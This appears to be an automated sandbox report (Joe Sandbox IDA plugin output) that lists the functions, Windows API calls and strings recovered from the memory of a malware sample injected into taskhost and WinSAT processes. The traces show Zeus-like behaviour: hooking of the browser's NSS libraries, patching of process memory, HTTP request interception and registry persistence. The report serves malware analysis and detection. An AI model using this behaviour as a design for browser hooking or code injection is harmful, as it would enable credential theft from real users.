Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00507EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(005016C0,00000000,00004401,005016D0,?), ref: 00507F29
CoCreateInstance.OLE32(00501690,00000000,00004401,005016A0,?), ref: 00507F7C

Strings

D, xrefs: 00507FA7

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051B4D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 0051B4F0

Part of subcall function 0051B265: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0051B28C
Part of subcall function 0051B265: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0051B2E0
Part of subcall function 0051B265: GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0051B343
Part of subcall function 0051B265: GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0051B36F

Part of subcall function 005133A3: HeapAlloc.KERNEL32(00000000,-00000004,0051B51B), ref: 005133B4

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

p Q, xrefs: 0051B554, 0051B56E, 0051B557
nspr4.dll, xrefs: 0051B4EB

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051515D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62

APIs

WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00515186

Part of subcall function 00513346: HeapAlloc.KERNEL32(00000008,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?,?), ref: 00513368
Part of subcall function 00513346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?), ref: 00513379

InternetReadFile.WININET(?,00001000,00001000,00001000), ref: 005151BD

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

PSZSdS2SnS<SFS, xrefs: 005151BD

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050A579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 0050A5C9

Part of subcall function 00518AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00518B23
Part of subcall function 00518AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00518B4A
Part of subcall function 00518AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00518B94
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00518BC1
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?), ref: 00518BF1
Part of subcall function 00518AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00518C1F
Part of subcall function 00518AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00518C31

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

#, xrefs: 0050A5AD
&, xrefs: 0050A59F

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00509C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00509CA8

Part of subcall function 00518AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00518B23
Part of subcall function 00518AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00518B4A
Part of subcall function 00518AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00518B94
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00518BC1
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?), ref: 00518BF1
Part of subcall function 00518AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00518C1F
Part of subcall function 00518AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00518C31

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

&, xrefs: 00509C7E
#, xrefs: 00509C8C

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051AA1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 0051AA6E

Part of subcall function 0051A6AF: SetLastError.KERNEL32(00002F78), ref: 0051A6F6
Part of subcall function 0051A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0051A762
Part of subcall function 0051A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0051A77E
Part of subcall function 0051A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0051A795
Part of subcall function 0051A6AF: EnterCriticalSection.KERNEL32(9), ref: 0051A79D
Part of subcall function 0051A6AF: LeaveCriticalSection.KERNEL32(9,?), ref: 0051A853
Part of subcall function 0051A6AF: EnterCriticalSection.KERNEL32(9), ref: 0051A87A
Part of subcall function 0051A6AF: LeaveCriticalSection.KERNEL32(9,?), ref: 0051A8BA

HttpSendRequestExA.WININET(?,?,?,?,?), ref: 0051AAA9

Strings

<SFS, xrefs: 0051AAA9

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051A97E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 0051262D: WaitForSingleObject.KERNEL32(00000000,0050776D), ref: 00512635

HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 0051A9D2

Part of subcall function 0051A6AF: SetLastError.KERNEL32(00002F78), ref: 0051A6F6
Part of subcall function 0051A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0051A762
Part of subcall function 0051A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0051A77E
Part of subcall function 0051A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0051A795
Part of subcall function 0051A6AF: EnterCriticalSection.KERNEL32(9), ref: 0051A79D
Part of subcall function 0051A6AF: LeaveCriticalSection.KERNEL32(9,?), ref: 0051A853
Part of subcall function 0051A6AF: EnterCriticalSection.KERNEL32(9), ref: 0051A87A
Part of subcall function 0051A6AF: LeaveCriticalSection.KERNEL32(9,?), ref: 0051A8BA

HttpSendRequestExW.WININET(?,?,?,?,?), ref: 0051AA0D

Strings

2SnS<SFS, xrefs: 0051AA0D

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00512B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 00512B1F
GetProcAddress.KERNEL32(00000000,?), ref: 00512B41

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

0x01D9C0A0, xrefs: 00512B63

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00518737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0051874E

Part of subcall function 005146F4: GetTickCount.KERNEL32(00518766,?), ref: 005146F4

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

Part of subcall function 0051856B: CreateFileW.KERNEL32(00514E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00518585
Part of subcall function 0051856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005185A8
Part of subcall function 0051856B: CloseHandle.KERNEL32(00000000), ref: 005185B5

Strings

tmp, xrefs: 00518767
%s%08x.%s, xrefs: 0051876C

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00516F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00516FB1

Part of subcall function 00518716: SetFileAttributesW.KERNEL32(00000080,00000080,0051B4CD,?), ref: 0051871F
Part of subcall function 00518716: DeleteFileW.KERNEL32(?), ref: 00518729

PathFindFileNameW.SHLWAPI(?), ref: 00516FD3

Part of subcall function 0051353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00514232,00000000,00000000,00000000,00513597,00000000,00000000,00000000,?,00000000), ref: 00513555

Strings

cab, xrefs: 00516FA6

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051C8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 00516AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,005149F4,?,?,?,00512326,000000FF,00522C08), ref: 00516AC3
Part of subcall function 00516AAA: GetLastError.KERNEL32(?,?,005149F4,?,?,?,00512326,000000FF,00522C08,?,?,00000000), ref: 00516AC9
Part of subcall function 00516AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,005149F4,?,?,?,00512326,000000FF,00522C08), ref: 00516AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0051C9FB,00000000,?,?,?), ref: 0051C8C6

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 00514CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 00514CEE
Part of subcall function 00514CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00514D0D
Part of subcall function 00514CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00514D19
Part of subcall function 00514CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,0051C8F5,00000000,00000000,00000000,0051C8F5,0051C8F5,00000000,?,?,?,00000000,00000044), ref: 00514D8A
Part of subcall function 00514CDD: CloseHandle.KERNEL32(?), ref: 00514D9D
Part of subcall function 00514CDD: CloseHandle.KERNEL32(?), ref: 00514DA2
Part of subcall function 00514CDD: FreeLibrary.KERNEL32(?), ref: 00514DB9

CloseHandle.KERNEL32(?), ref: 0051C907

Strings

"%s", xrefs: 0051C8DA

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00510397, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41

APIs

getpeername.WS2_32(000000FF,00000000,00000000), ref: 005103BB
getsockname.WS2_32(000000FF,00000000,00000000), ref: 005103CA

Part of subcall function 005163E5: #19.WS2_32(00000000,00000000,00000000,00000000,0050EF4E,?,00000000,00000004,?,00000000,00000000,00000000,?,00000000), ref: 005163F3

Strings

<MP, xrefs: 00510397

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 00515484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 00515403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00515414
Part of subcall function 00515403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00515427
Part of subcall function 00515403: FreeLibrary.KERNEL32(?), ref: 00515479

GetTickCount.KERNEL32(?), ref: 005154C9

Part of subcall function 005152D1: WaitForSingleObject.KERNEL32(?,?), ref: 00515325
Part of subcall function 005152D1: Sleep.KERNEL32(?,?,?,00000000), ref: 00515338
Part of subcall function 005152D1: InternetCloseHandle.WININET(00000000), ref: 005153BE

GetTickCount.KERNEL32(00000000), ref: 005154DB

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Strings

http://www.google.com/webhp, xrefs: 005154A9

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051672E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18

APIs

Part of subcall function 0051666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 005166EA
Part of subcall function 0051666B: WSASetLastError.WS2_32(0000274C), ref: 005166F9

accept.WS2_32(00000000,00000000,00000001), ref: 00516754

Strings

K2w, xrefs: 00516754
<MP, xrefs: 0051672E

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0050A2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 00518C40: PathCombineW.SHLWAPI(00511F45,00511F45,?), ref: 00518C5F

Part of subcall function 005185D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 005185F5
Part of subcall function 005185D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00512D27,?,?,00000000), ref: 00518608
Part of subcall function 005185D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00512D27,?,?,00000000), ref: 00518630
Part of subcall function 005185D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00518648
Part of subcall function 005185D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00512D27,?,?,00000000), ref: 00518662
Part of subcall function 005185D0: CloseHandle.KERNEL32(?), ref: 0051866B

StrStrIA.SHLWAPI(?,?), ref: 0050A410
StrStrIA.SHLWAPI(?,?), ref: 0050A422
StrStrIA.SHLWAPI(?,?), ref: 0050A432
StrStrIA.SHLWAPI(?,?), ref: 0050A444

Part of subcall function 005140AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 005140CF

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

Part of subcall function 00518678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,0051C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 00518689
Part of subcall function 00518678: CloseHandle.KERNEL32(?), ref: 00518697

Part of subcall function 0051338B: HeapAlloc.KERNEL32(00000008,-00000004,00514B59,00000000,?,?,?,00511E08,00000000,005122ED,?,?,00000000), ref: 0051339C

Part of subcall function 00518AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00518B23
Part of subcall function 00518AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00518B4A
Part of subcall function 00518AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00518B94
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00518BC1
Part of subcall function 00518AE4: Sleep.KERNEL32(00000000,?,?), ref: 00518BF1
Part of subcall function 00518AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00518C1F
Part of subcall function 00518AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00518C31

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Function 0051AD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00523FB4,?,?,?,0051B052,?), ref: 0051AD7C

Part of subcall function 005133BB: HeapFree.KERNEL32(00000000,00000000,00514BB2), ref: 005133CE

LeaveCriticalSection.KERNEL32(00523FB4,?,?,?,0051B052,?), ref: 0051AD9D
EnterCriticalSection.KERNEL32(00523FB4,?,?,?,?,0051B052,?), ref: 0051ADAE

Part of subcall function 00513346: HeapAlloc.KERNEL32(00000008,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?,?), ref: 00513368
Part of subcall function 00513346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,005136F5,?,?,00000000,005141E1,?,?,?,?,?,00514191,?,?), ref: 00513379

LeaveCriticalSection.KERNEL32(00523FB4,?,?,?,0051B052,?), ref: 0051AE47

Memory Dump Source

Source File: 00000007.00000002.1767633027.00500000.00000040.sdmp, Offset: 00500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_500000_taskhost.jbxd

Analysis Process: WinSAT.exe PID: 1352 Parent PID: 3700

Executed Functions

Function 01D220C4, Relevance: 49.2, APIs: 17, Strings: 11, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 01D22105
LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01D22172
GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 01D221A7
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01D221DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 01D221FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 01D2220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 01D2221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 01D22230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 01D22242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 01D22254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 01D2228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 01D2229C
InitializeCriticalSection.KERNEL32(01D3400C,?,?,00000000), ref: 01D222C9
WSAStartup.WS2_32(00000202,?), ref: 01D222DF
CreateEventW.KERNEL32(01D32C30,00000001,00000000,00000000,?,?,00000000), ref: 01D22300

Part of subcall function 01D249D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,01D22326,000000FF,01D32C08,?,?,00000000), ref: 01D249E2
Part of subcall function 01D249D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,01D22326,000000FF,01D32C08), ref: 01D24A0E
Part of subcall function 01D249D2: CloseHandle.KERNEL32(?), ref: 01D24A23

GetLengthSid.ADVAPI32(00000000,000000FF,01D32C08,?,?,00000000), ref: 01D22335

Part of subcall function 01D21E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 01D21E4B
Part of subcall function 01D21E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 01D21E5A
Part of subcall function 01D21E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 01D21E6E

GetCurrentProcessId.KERNEL32(00000000,037CF7D0,00000000,?,?,00000000), ref: 01D22362

Part of subcall function 01D21E8F: IsBadReadPtr.KERNEL32(?,?), ref: 01D21EBD

Part of subcall function 01D27A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 01D27AB5

Part of subcall function 01D21F98: InitializeCriticalSection.KERNEL32(01D33FB4,00000000,76C61857,00000000), ref: 01D21FAF
Part of subcall function 01D21F98: InitializeCriticalSection.KERNEL32(01D32AC8), ref: 01D21FE4
Part of subcall function 01D21F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01D2200C
Part of subcall function 01D21F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 01D22029
Part of subcall function 01D21F98: CloseHandle.KERNEL32(00000000), ref: 01D2203A
Part of subcall function 01D21F98: InitializeCriticalSection.KERNEL32(01D323AC), ref: 01D22081
Part of subcall function 01D21F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 01D22093
Part of subcall function 01D21F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 01D2209E

Part of subcall function 01D21EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 01D21F2C
Part of subcall function 01D21EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 01D21F56

Strings

LdrGetDllHandle, xrefs: 01D22244
NtQueryInformationProcess, xrefs: 01D2220E
NtCreateUserProcess, xrefs: 01D221FC
LoadLibraryA, xrefs: 01D22127
LdrLoadDll, xrefs: 01D22232
Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 01D223F3
RtlUserThreadStart, xrefs: 01D22220
GetProcAddress, xrefs: 01D2211D
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 01D223AB
NtCreateThread, xrefs: 01D221F4
SOFTWARE\Microsoft\Xyuxy, xrefs: 01D223F9

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D21F98, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(01D33FB4,00000000,76C61857,00000000), ref: 01D21FAF
InitializeCriticalSection.KERNEL32(01D32AC8), ref: 01D21FE4

Part of subcall function 01D22828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01D228A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01D2200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 01D22029
CloseHandle.KERNEL32(00000000), ref: 01D2203A

Part of subcall function 01D29D6D: InitializeCriticalSection.KERNEL32(01D33F24,00000000,7718F8FF), ref: 01D29D8F
Part of subcall function 01D29D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 01D29E63

Part of subcall function 01D2B4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 01D2B4F0

InitializeCriticalSection.KERNEL32(01D323AC), ref: 01D22081

Part of subcall function 01D1E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 01D1E108
Part of subcall function 01D1E0FB: GetThreadDesktop.USER32(00000000), ref: 01D1E10F
Part of subcall function 01D1E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 01D1E128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 01D22093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 01D2209E

Part of subcall function 01D1C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,01D220A9), ref: 01D1C111
Part of subcall function 01D1C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,01D220A9), ref: 01D1C125
Part of subcall function 01D1C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 01D1C132
Part of subcall function 01D1C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 01D1C13F
Part of subcall function 01D1C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 01D1C14C

Strings

nspr4.dll, xrefs: 01D2208E
nss3.dll, xrefs: 01D22099

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D24B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D24B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D24B3F
GetLastError.KERNEL32(?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D24B45

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D24B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D24B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D24B8B

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

CloseHandle.KERNEL32(?), ref: 01D24BB6

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D27BF7, Relevance: 7.6, APIs: 5, Instructions: 108

APIs

Part of subcall function 01D27BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,01D1C168,DB84D88A,?,?,?,01D1BD76,00000000,00000000,00000004,?,?,01D1C160), ref: 01D27BC7

VirtualProtectEx.KERNELBASE(000000FF,01D1C160,0000001E,00000040,01D32360,01D1C158,00000004,?,?,?,?,01D1BE97,6A01D323,00000000), ref: 01D27C24
ReadProcessMemory.KERNELBASE(000000FF,01D1C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,01D1BE97,6A01D323,00000000), ref: 01D27C4B
WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 01D27CC5
WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 01D27CED
VirtualProtectEx.KERNELBASE(000000FF,01D1C160,0000001E,01D32360,01D32360,?,?,?,?,01D1BE97,6A01D323,00000000,?,?,01D1C160,01D32360), ref: 01D27D05

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 01D276B3

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 01D276E2

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

RegCloseKey.KERNEL32(?), ref: 01D27702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 01D27699

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1E89E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 01D1E8E0

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D2768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 01D276B3
Part of subcall function 01D2768E: RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 01D276E2
Part of subcall function 01D2768E: RegCloseKey.KERNEL32(?), ref: 01D27702

Strings

Qanyodfyy, xrefs: 01D1E8B7, 01D1E8F2
SOFTWARE\Microsoft\Xyuxy, xrefs: 01D1E8A7, 01D1E8B2, 01D1E8BE, 01D1E8D9

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

